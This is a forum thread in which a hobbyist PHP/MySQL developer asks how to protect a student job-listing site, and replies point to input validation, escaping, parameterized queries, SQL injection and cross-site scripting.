Logical1

I have started a project of my own -non for profit- databased web site to help students who are looking for summer job. (as you might have guessed from my previous questions). I am very worried about hacking and malicious attempts at deleting the database or causing problem.
What expereinces do you have and what measures do you find necessary when working with MySQL, PHP and JS in developing such interactive web sites?
Altough no one will be paying for anything and it is an experiment of my own still I feel it has to be secure as a professional job (in real life yours truly is not a professional programmer as you might have correctly figured out. But I find this type of programmng very interesting hobby, very much like clock makers of a few centuries ago).
Yours
Logical 1
PS In case anyone is interested in participating in such a project let me know. But meanwhile please suggest measures to make the thing secure for the users.

__________________
^c^

Jimbo

Validate all and any user input - this is key. Use mysql_real_escape_string() for any and all input that goes into a query. Consider using parameterized queries or stored procedures (not sure what PHP/MySQL supports in this regard, you'll have to look around). Also learning about SQL Injection attacks (the biggest exploit you're trying to prevent) and how to prevent them might yield other ideas.

__________________
<insert disclaimer here>
<insert shameless plug for Visual Studio here>

Infinite Recursion

The first thing that came to my mind was SQL Injection, which Jimbo has already mentioned. Best bet, for starters, is to read up on that and determine the most efficient way to block such an attack. May as well block all of China and Taiwan while your at it.. j/k

__________________
http://jasonpowers.net

"There are a thousand hacking at the branches of evil to one who is striking at the root."

kruptof

Also look into sanitizing all your user generated content to protect against cross site scripting.

__________________

Logical1

Thank you for your answers but I am still in the dark.
1. My server runs PHP 4.0.3 and I can not run mysql_real_escape_string() on it. Altough this does not much more then addslashes() or other similar stuff.
2. If a hacker would try to gain access he has to pass arguments into the forms. What specific examples do you know and if my forms are simple such as
Name:
Email:
Phone:
Job title:
Job description:

and the entries go to specific columns in specific tables how can they hack?
3. Does anyone know a good PHP encryption function somehwere?
4. How do you sanitize your entires against SQL code entered instead of nomal entries?
5. This issue sounds so vague that one doesn't know what to prevent. I can write code against what I know might happen, problem is that in this case I do not know what else can be tried.
thanks

__________________
^c^

Jimbo

1. It escapes any values which might affect a SQL query, IIRC. You can certainly use alternates or build your own.
2. If you don't validate the input going into the database, someone might try to read the data in it, or even just delete it (if you don't understand the comic, ask). They might also try to change arbitrary values or insert data.
4. Validate the data, or find an alternative to creating the SQL query in the webpage (e.g. stored procedures).
5. SQL Injection is a pretty well understood attack; understanding how it works hinges a lot (IMHO) on finding a description which is worded along the same lines your brain operates.
Cross-site scripting (XSS), which kruptof brought up, is an attack largely brought about by the rise of AJAX, and it usually involves a malicious script which sends data contained in your website to whoever injected the script. Information about how the attack works and how to prevent it should still be plenty of data available, if you look hard enough.

__________________
<insert disclaimer here>
<insert shameless plug for Visual Studio here>

Logical1

Thanks Jimbo and eveybody else.
1. Silly as it seems, I think I have to write a function similar to mysql_real_escape_string() so it would run on my old version.
2. I have searched and did not find any way in PHP to read or recognize history (last page viewed , etc.) . Does any one have a solution for it?
I am trying to find the last page before any form gets processed and limit it only to my own ligitimate form (to avoid XSS).
3. If any one knows of a good book in this topic it is highly apreciated

When I started this project I though t I would be happy to see it work, apparently that's only half the problem.
L1

__________________
^c^